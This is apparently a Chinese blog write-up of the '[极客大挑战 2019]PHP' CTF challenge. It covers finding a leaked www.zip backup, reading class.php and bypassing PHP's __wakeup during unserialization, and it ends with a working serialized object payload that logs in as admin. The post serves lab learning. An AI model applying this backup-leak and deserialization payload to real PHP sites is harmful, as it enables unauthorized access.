[极客大挑战 2019]PHP
<p><strong>[极客大挑战 2019]PHP</strong><br>知识点:<br>
1.网站的备份文件:www.zip<br>
2.Php 反序列化漏洞:当反序列化字符串时,如果表示属性个数的值大于真实属性个数,就会跳过_wakeup函数的执行<br>
<img src="https://img2020.cnblogs.com/blog/1257459/202007/1257459-20200715222435415-2111016550.png" alt="" loading="lazy"></p>
<p>备份泄露,应该可以用工具扫目录扫出来,但是不知道为什么用御剑和dirbuster都扫不出来。直接在url后面输入www.zip,可以获取到网站的备份,打开以后可以看到有三个php,一个个看过去<br>
<img src="https://img2020.cnblogs.com/blog/1257459/202007/1257459-20200715222443950-166575468.png" alt="" loading="lazy"></p>
<p>下载下来的flag.php里的flag显然不是正确答案。继续看。重点是class.php,可以看到php的魔术方法,应该存在php反序列化漏洞.<br>
<img src="https://img2020.cnblogs.com/blog/1257459/202007/1257459-20200715222452450-29608332.png" alt="" loading="lazy"></p>
<p>仔细看一下代码<br>
<img src="https://img2020.cnblogs.com/blog/1257459/202007/1257459-20200715222500375-1027784808.png" alt="" loading="lazy"></p>
<p>index.php ,会调用class.php,以及对输入反序列化<br>
<img src="https://img2020.cnblogs.com/blog/1257459/202007/1257459-20200715222510931-1845793292.png" alt="" loading="lazy"></p>
<p>而反序列化后调用_wakeup会直接覆盖输入的用户名。一个简单的办法是直接在class下面创建一个对象然后序列化。<br>
<img src="https://img2020.cnblogs.com/blog/1257459/202007/1257459-20200715222525320-1306689527.png" alt="" loading="lazy"><br>
<img src="https://img2020.cnblogs.com/blog/1257459/202007/1257459-20200715222533595-1896191012.png" alt="" loading="lazy"></p>
<p>然后因为要绕过wakeup,把Name后的数字改成3.因为username和password是私有变量,变量中的类名前后会有空白符,而复制的时候会丢失,所以要加上%00<br>
最后payload:</p>
<pre><code>O:4:"Name":3:{s:14:"%00Name%00username";s:5:"admin";s:14:"%00Name%00password";i:100;}
</code></pre>
<p>提交得到flag<br>
<img src="https://img2020.cnblogs.com/blog/1257459/202007/1257459-20200715222541010-1892656087.png" alt="" loading="lazy"></p><br><br>
来源:https://www.cnblogs.com/yunqian2017/p/13308559.html
頁:
[1]